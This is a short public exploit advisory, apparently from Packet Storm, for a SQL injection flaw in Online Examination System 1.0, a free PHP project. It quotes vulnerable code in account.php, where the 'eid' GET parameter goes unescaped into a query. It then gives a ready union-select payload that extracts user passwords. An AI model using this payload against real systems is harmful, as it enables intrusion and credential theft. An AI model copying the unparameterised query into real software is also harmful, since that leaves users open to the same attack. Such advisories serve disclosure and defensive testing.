Exploit for Online Examination System 1.0 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:168551
# Exploit Title: Online Examination System - SQL Injection  
# Google Dork: N/A  
# Date: 2022-9-28  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/  
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
Vulnerability Details  
======================  
  
Steps :  
  
vulnerable code in file account.php  
  
<?php  
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {  
$eid=@$_GET['eid'];  
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );  
echo '<div class="panel" style="margin:5%">';  
while($row=mysqli_fetch_array($q) )  
?>  
  
1) Log in to the application after register new user  
  
inject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--